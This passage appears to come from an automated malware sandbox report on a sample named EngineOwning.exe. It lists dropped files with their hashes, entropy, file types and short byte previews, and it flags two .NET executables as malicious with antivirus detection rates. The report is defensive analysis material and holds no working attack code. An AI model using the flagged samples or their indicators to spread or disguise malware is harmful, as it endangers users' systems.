                                                                              Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.6.4.....E.v.e.n.t.T.i.m.e.=.1.3.2.9.5.5.0.6.1.6.4.4.9.1.0.2.5.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.9.5.5.0.6.1.7.0.6.4.7.2.5.4.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.9.c.2.a.c.0.c.-.f.5.7.1.-.4.4.f.7.-.b.3.b.c.-.e.8.9.a.7.0.a.7.2.f.c.8.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.5.9.9.4.d.4.2.-.4.3.e.9.-.4.f.9.a.-.a.f.c.d.-.4.6.9.4.4.2.0.3.d.5.9.6.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.E.n.g.i.n.e.O.w.n.i.n.g...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.a.4.-.0.0.0.1.-.0.0.1.7.-.1.2.7.e.-.7.e.8.1.e.c.5.9.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.7.b.9.8.2.8.a.f.7.6.e.1.5.e.b.5.5.6.e.1.c.5.0.3.5.d.d.9.6.2.d.8.0.0.0.0.f.f.f.f.!.0.0.0.0.e.4.b.9.4.0.5.e.0.6.9.7.6.b.9.7.2.1.c.3.9.9.6.c.f.b.3.e.e.9.5.a.1.f.8.b.b.2.8.c.!.E.n.g.i.n.e.O.w.n.i.n.g...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.2././.0.4././.2.
                                                                              Process:C:\Windows\System32\WerFault.exe
                                                                              File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):65536
                                                                              Entropy (8bit):1.037985811644739
                                                                              Encrypted:false
                                                                              SSDEEP:192:E8LleTx0yHNNjWa1V3Z/u7saS274ltvb:PL4TnNNjWah/u7saX4ltv
                                                                              MD5:3122AF370C858A05237FC3293976174D
                                                                              SHA1:44694D342D1AB4F10469F0205243E6C9FE40928D
                                                                              SHA-256:9D314C7761512C05BA87BB2275B5324304D770D0088A215499666E6DED378A0E
                                                                              SHA-512:1966745B0CE3A2131ABAB7F08478C430620E1A5FF1A3B0D7B9A8FBD79A758725269B1F6B5314F6C2CB9340847C620955889BFE499559D11A5A15B1BAE4E491E5
                                                                              Malicious:false
                                                                              Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.2.9.5.5.0.6.1.7.7.0.8.5.0.7.6.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.9.5.5.0.6.1.7.9.7.2.5.7.0.2.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.7.4.b.d.f.e.5.-.0.6.8.a.-.4.c.9.e.-.b.c.e.6.-.6.5.7.8.1.5.0.c.9.4.c.1.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.e.d.a.0.a.0.f.-.9.2.c.9.-.4.e.7.d.-.8.8.d.5.-.7.e.b.6.e.1.4.f.8.b.5.7.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.m.d.s.i.g.s.t.u.b...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.D.f.s.r.A.d.m.i.n...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.9.2.4.-.0.0.0.1.-.0.0.1.7.-.0.4.b.9.-.4.1.8.9.e.c.5.9.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.0.4.e.d.2.1.b.b.4.7.0.e.1.8.f.b.3.0.9.4.3.4.1.e.9.e.7.e.c.b.0.7.0.0.0.0.0.0.0.0.!.0.0.0.0.e.b.2.b.1.e.a.4.3.3.1.2.e.3.8.0.e.6.1.d.9.0.a.f.6.a.1.c.5.0.3.7.2.d.a.3.4.1.c.0.!.m.d.s.i.g.s.t.u.b...e.
                                                                              Process:C:\Windows\System32\WerFault.exe
                                                                              File Type:Mini DuMP crash report, 14 streams, Wed Apr 27 04:09:25 2022, 0x1205a4 type
                                                                              Category:dropped
                                                                              Size (bytes):182834
                                                                              Entropy (8bit):1.4450775362374317
                                                                              Encrypted:false
                                                                              SSDEEP:192:ZhYzviFPQ5v3HhJEDTVS1PgOcCFswdW5CugwPwGJqBAQHMu3hBB59A+d5yvVbNn:gWFPQl3HHEDTg1fnFsw5A8tw+7yvlNn
                                                                              MD5:4EC6442E21743C90C4B7C55D39B6C1EB
                                                                              SHA1:23B935E1881E2A3224EA4CAB60FFDBF09463831C
                                                                              SHA-256:24BB8E3773727800CB99B53F1DEEE79F6F441FCD5EF25F7E960FB55930934C04
                                                                              SHA-512:C48296FE6BCEAB50D04002F1F4B1C534C8BAF5C49CF6B771DF25DCDFD929931B69C73800299365C67F9E7C571395481B53DE9DB1668ABE9912E172A36305C979
                                                                              Malicious:false
                                                                              Preview:MDMP....... .........hb............D...........p...L.......4...fm..........T.......8...........T............I...............$...........&...................................................................U...........B......@'......Lw................E.....T.............hb.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Windows\System32\WerFault.exe
                                                                              File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):8834
                                                                              Entropy (8bit):3.6968723388071423
                                                                              Encrypted:false
                                                                              SSDEEP:192:Rrl7r3GLNifXrG6YoTefMbgmf9ncbSiCpDY89boBOfqYm:RrlsNiDG6Ycef4gmfabSno4fE
                                                                              MD5:74AE1EF85C88769EB34B5C1DA56CE5DA
                                                                              SHA1:0353F46D1D5E9A9E1EBC693BA361BD6FC9131184
                                                                              SHA-256:E1F899C237697C2C30586DA4968A0261D17068409961121B4EA94EF4FF31AD75
                                                                              SHA-512:C5A49B7DAB05CAB00CE510C4ABE06D74D23C7613CD99A57D29B29618116551347C071925E5DB4BE45D417DF0B76820907D88BC9C0EDDB87C94CE0070D35D87C3
                                                                              Malicious:false
                                                                              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.0.7.6.<./.P.i.d.>.......
                                                                              Process:C:\Windows\System32\WerFault.exe
                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):4760
                                                                              Entropy (8bit):4.442158150913463
                                                                              Encrypted:false
                                                                              SSDEEP:48:cvIwSD8zsJNJgtBI97Av6Wgc8sqYjAh8fm8M4JijSy3hNFbyq8vzjSy3hXGDF+03:uITfpizgrsqY8mJijzNWzjz9GBr5d
                                                                              MD5:BBDFBA669EFE0242222250D709C5F12D
                                                                              SHA1:28D12FE335A6A3235F8AE5C6208203B6EFF53E97
                                                                              SHA-256:B963DD69C78D778F3D04212C6CB43E7AEFA6654FB99730423E5ADFCDEBC48254
                                                                              SHA-512:B4030C0BDE44B4EC0C45271584544BC0A74463101B37B07760F98C6720C8F6D916F5E54BD31232B3285A4BAEC92350ADE4F29450D92E782BF76AE3CDA1C206D4
                                                                              Malicious:false
                                                                              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1489760" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                              Process:C:\Windows\System32\WerFault.exe
                                                                              File Type:Mini DuMP crash report, 15 streams, Wed Apr 27 04:09:38 2022, 0x1205a4 type
                                                                              Category:dropped
                                                                              Size (bytes):297972
                                                                              Entropy (8bit):3.0224550324610098
                                                                              Encrypted:false
                                                                              SSDEEP:3072:heH8HdZgwGwschv5r4RpF0+ZEZhPZkl9c7h5ewHQ6:wH8Hf106eKPZPhH/
                                                                              MD5:A610DCBDED870746E0B92001AE5B5DA5
                                                                              SHA1:D890BC7BDB5BE978604BEBB6ADA5C8B2CAFC7085
                                                                              SHA-256:4861D9AD8AB202FD8D2C886BC512EE2985EEAFB1870BBCA44F314E2DC61346AB
                                                                              SHA-512:2C878198708384539F21BB1CB5950D012C13144CE566D8A52AF3546474F32307B2A9ABEDB67EF375A9749E0A0A1E3B0F8DE2EC5C8ABFF612A63756027EBDE7B5
                                                                              Malicious:false
                                                                              Preview:MDMP....... .........hb.................................... ...........D ...b..........`.......8...........T...........h*...a...........)...........+...................................................................U...........B......8,......Lw................0[%...T.......$.....hb.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Windows\System32\WerFault.exe
                                                                              File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):6564
                                                                              Entropy (8bit):3.718429918791739
                                                                              Encrypted:false
                                                                              SSDEEP:192:Rrl7r3GLNiaKzYZ3SGCpD3N89bnLvfv2tm:RrlsNinzYpSxqnTfvt
                                                                              MD5:5A8E45F27C4F8B4DFE7C52A92DDC81FA
                                                                              SHA1:60E2D5CAE61C22AB854ADDD16AB1CDA43877D2E7
                                                                              SHA-256:8EFB7E5BF6432E998CBB567A4BD839EFFD64D16B516FFBA699F1EF15506BE3CC
                                                                              SHA-512:896467936619239D1590854A151978E23D7810E80185374A77D4ED2996CBE61C6B0461C16126F1E92FC4DE12B295F7E0C754EF86F40602271B26AFAD9C0AA580
                                                                              Malicious:false
                                                                              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.4.3.6.<./.P.i.d.>.......
                                                                              Process:C:\Windows\System32\WerFault.exe
                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):4757
                                                                              Entropy (8bit):4.429425328001861
                                                                              Encrypted:false
                                                                              SSDEEP:48:cvIwSD8zsJNJgtBI97Av6Wgc8sqYjAo8fm8M4JDZA63yPF5yq8vFA63ymhOtstdd:uITfpizgrsqY8FJWC4WOCthM6dd
                                                                              MD5:3FDDF38437554F6F36CA9F1CC53075DD
                                                                              SHA1:4B229D08BD5B279E8D39125B1611B0F1A811DC6B
                                                                              SHA-256:C3D55EEDB988877C8ADE7BBCD609FFE04541A8AB7672BFAF2E7A51821F507B8E
                                                                              SHA-512:8E7B065E139984AFCBE5F75AE188554DE371E063542ED1CE47FDB1527EE1FB0C50E285894A2D7E310E04E4A5B827AE7ED10AC48597175CB42A09D603508D9735
                                                                              Malicious:false
                                                                              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1489760" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                              Process:C:\Users\user\Desktop\EngineOwning.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):57856
                                                                              Entropy (8bit):5.8573068498051715
                                                                              Encrypted:false
                                                                              SSDEEP:768:Kdiv4Kbwg2V+YV51fADYI1WQZCnqLMh0AoE7pwaambG4lR/G9KGYA65hXI3T:K+bqskqLzECafbX3/Gk5pI3T
                                                                              MD5:62D39F4717804AE34F820704722C5284
                                                                              SHA1:EB2B1EA43312E380E61D90AF6A1C50372DA341C0
                                                                              SHA-256:3848C2542D299EC5718D1ED0437FE56847FD2E17200020EBBB8DAF7DE792C1E9
                                                                              SHA-512:A63A65F879069A19C72287E83EE9F00893E3126FD3B4DE8430068B93D0D078FCE3E03C4501FE98648DF286060212C5AC3F6551B0C3C02EC708551407E0ADC8F8
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: Avira, Detection: 100%
                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                              • Antivirus: Virustotal, Detection: 72%, Browse
                                                                              • Antivirus: Metadefender, Detection: 34%, Browse
                                                                              • Antivirus: ReversingLabs, Detection: 77%
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....p,b............................n.... ........@.. .......................@............@................................. ...K............................ ....................................................... ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B................P.......H..........<m...........|..V............................................W......H3.......W......3........./.\...z.(......}.....(....o....}....*n..}.....{....,..{....oa...*..{....*.s....z2.{.....<...*..(....*z.(......}.....(....o....}....*.*..{....*2.{.....<...*..(....*z.(......}.....(....o....}....*n..}.....{....,..{....oa...*..{....*2.{.....<...*..(....*..(....*2. ....o4...*j. ....o4.....(Q.....o6...*~. ....o4.....(8...(M.....o6...*n.,.. ....o4...*. ....o4...*j(?... .A.(S..
                                                                              Process:C:\Users\user\Desktop\EngineOwning.exe
                                                                              File Type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):4442624
                                                                              Entropy (8bit):7.998792696058525
                                                                              Encrypted:true
                                                                              SSDEEP:98304:PdfyY1PrgE21Iec3nuSwkw0wjRKNCLkibijuKNoVEHeK1:lKMPrR2uec3nokw0CKCLHbiNeo
                                                                              MD5:108368196293017A706ADE912F519495
                                                                              SHA1:A11265CEF65B6FA780EF212E099E75FBF4603CD5
                                                                              SHA-256:836B0CBA74A9CEDE49BCA5E7FB1B96B1A327065C29648C1B0203D7D1F71B2CC2
                                                                              SHA-512:8705330672ECAC742624E45ABF6A0C5715C07C1BC7EB8197BB09767BD8A80E47D3ED04B6C62A21772644686AED8ABE15813CE672D4FC705621E9F6F9C6E79AEC
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: Avira, Detection: 100%
                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                              • Antivirus: Virustotal, Detection: 25%, Browse
                                                                              • Antivirus: ReversingLabs, Detection: 41%
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....zfb.........."...........C..........@C....@..... ....................... D...........@...@......@............... ................................D..............................................................................................@C.H...........a...%0r0..C.. ....C.................@....text...`....@C.......C............. ..`.rsrc.........D.......C.............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                              Process:C:\ProgramData\winrsdhost.exe
                                                                              File Type:ASCII text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):973
                                                                              Entropy (8bit):5.374440234733254
                                                                              Encrypted:false
                                                                              SSDEEP:12:Q3La/KDLI4MWuPTxAIWzAbDLI4MNCIBTaDAWDLI4MWuC51KDLI4MN5P6D1Bakvoc:ML9E4Kr8sXE4+aE4Ki1qE4GiD0E4KeGj
                                                                              MD5:598FC8C0A15FE852CC448B0717AF8862
                                                                              SHA1:EB84113EE993C995B7BD34FBF757397388C1B9BC
                                                                              SHA-256:3A53B1DF267D7120B941EDC515EF6F1F3CF819FE70BC94BDFF60DB5DDB6A595E
                                                                              SHA-512:9DA631F6A406BF8BDDD814536F267F3E0AA7BD27EDC3B20BDFF7B351A73F53180EC6FDB84C766D299A02A7CC35AA36CD748FBBD7D9912E3FBE0C49AD27FC3F86
                                                                              Malicious:false
                                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..3,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Management\d0f4eb5b1d0857aabc3e7dd079735875\System.Management.ni.dll",0..2,"System.IO.Compression, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\49e5c0579db170be9741dccc34c1998e\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\6d7d43e19d7fc0006285b85b7e2c8702\System.Windows.Forms.ni.dll",0..
                                                                              Process:C:\Users\user\Desktop\EngineOwning.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):57856
                                                                              Entropy (8bit):5.8573068498051715
                                                                              Encrypted:false
                                                                              SSDEEP:768:Kdiv4Kbwg2V+YV51fADYI1WQZCnqLMh0AoE7pwaambG4lR/G9KGYA65hXI3T:K+bqskqLzECafbX3/Gk5pI3T
                                                                              MD5:62D39F4717804AE34F820704722C5284
                                                                              SHA1:EB2B1EA43312E380E61D90AF6A1C50372DA341C0
                                                                              SHA-256:3848C2542D299EC5718D1ED0437FE56847FD2E17200020EBBB8DAF7DE792C1E9
                                                                              SHA-512:A63A65F879069A19C72287E83EE9F00893E3126FD3B4DE8430068B93D0D078FCE3E03C4501FE98648DF286060212C5AC3F6551B0C3C02EC708551407E0ADC8F8
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: Avira, Detection: 100%
                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                              • Antivirus: Virustotal, Detection: 72%, Browse
                                                                              • Antivirus: Metadefender, Detection: 34%, Browse
                                                                              • Antivirus: ReversingLabs, Detection: 77%
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....p,b............................n.... ........@.. .......................@............@................................. ...K............................ ....................................................... ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B................P.......H..........<m...........|..V............................................W......H3.......W......3........./.\...z.(......}.....(....o....}....*n..}.....{....,..{....oa...*..{....*.s....z2.{.....<...*..(....*z.(......}.....(....o....}....*.*..{....*2.{.....<...*..(....*z.(......}.....(....o....}....*n..}.....{....,..{....oa...*..{....*2.{.....<...*..(....*..(....*2. ....o4...*j. ....o4.....(Q.....o6...*~. ....o4.....(8...(M.....o6...*n.,.. ....o4...*. ....o4...*j(?... .A.(S..
                                                                              Process:C:\Users\user\Desktop\EngineOwning.exe
                                                                              File Type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):4442624
                                                                              Entropy (8bit):7.998792696058525
                                                                              Encrypted:true
                                                                              SSDEEP:98304:PdfyY1PrgE21Iec3nuSwkw0wjRKNCLkibijuKNoVEHeK1:lKMPrR2uec3nokw0CKCLHbiNeo
                                                                              MD5:108368196293017A706ADE912F519495
                                                                              SHA1:A11265CEF65B6FA780EF212E099E75FBF4603CD5
                                                                              SHA-256:836B0CBA74A9CEDE49BCA5E7FB1B96B1A327065C29648C1B0203D7D1F71B2CC2
                                                                              SHA-512:8705330672ECAC742624E45ABF6A0C5715C07C1BC7EB8197BB09767BD8A80E47D3ED04B6C62A21772644686AED8ABE15813CE672D4FC705621E9F6F9C6E79AEC
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: Avira, Detection: 100%
                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                              • Antivirus: ReversingLabs, Detection: 41%
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....zfb.........."...........C..........@C....@..... ....................... D...........@...@......@............... ................................D..............................................................................................@C.H...........a...%0r0..C.. ....C.................@....text...`....@C.......C............. ..`.rsrc.........D.......C.............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1292
                                                                              Entropy (8bit):5.353484982621018
                                                                              Encrypted:false
                                                                              SSDEEP:24:3vU1PpQrLAo4KAxX5qRPD42HOoVZe9t4CvKuKnKJRSF8PQ9b6F:81PerB4nqRL/Hvfe9t4Cv94aR48Y9eF
                                                                              MD5:723196BC6244D1F2FBAD36B73FC79C88
                                                                              SHA1:933EE55DEC20ACCC8F72B308EDEA09601F45FB05
                                                                              SHA-256:3BA1B7BE0F3D61ABBF4E126AB426248CD8B77C0757ED1C13FF79EB80491370DA
                                                                              SHA-512:4C155FB9C596D6C6ED46BC1C471343E10C6E509BD0A5F18E71BA29285EB43BD6C3DDA83DAB4FAADAF142920B4E49FB64A5D9CD93C0420ED347D14EBF366A7402
                                                                              Malicious:false
                                                                              Preview:@...e.................................7.?............@..........8................'....L..}............System.Numerics.H...............<@.^.L."My...:...... .Microsoft.PowerShell.ConsoleHost0...............G-.o...A...4B..........System..4...............[...{a.C..%6..h.........System.Core.D...............fZve...F.....x.)........System.Management.AutomationL...............7.....J@......~.......#.Microsoft.Management.Infrastructure.<................H..QN.Y.f............System.Management...@................Lo...QN......<Q........System.DirectoryServices4................Zg5..:O..g..q..........System.Xml..4...............T..'Z..N..Nvj.G.........System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<...............)L..Pz.O.E.R............System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:very short file (no magic)
                                                                              Category:dropped
                                                                              Size (bytes):1
                                                                              Entropy (8bit):0.0
                                                                              Encrypted:false
                                                                              SSDEEP:3:U:U
                                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                              Malicious:false
                                                                              Preview:1
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:very short file (no magic)
                                                                              Category:dropped
                                                                              Size (bytes):1
                                                                              Entropy (8bit):0.0
                                                                              Encrypted:false
                                                                              SSDEEP:3:U:U
                                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                              Malicious:false
                                                                              Preview:1
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:very short file (no magic)
                                                                              Category:dropped
                                                                              Size (bytes):1
                                                                              Entropy (8bit):0.0
                                                                              Encrypted:false
                                                                              SSDEEP:3:U:U
                                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                              Malicious:false
                                                                              Preview:1
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:very short file (no magic)
                                                                              Category:dropped
                                                                              Size (bytes):1
                                                                              Entropy (8bit):0.0
                                                                              Encrypted:false
                                                                              SSDEEP:3:U:U
                                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
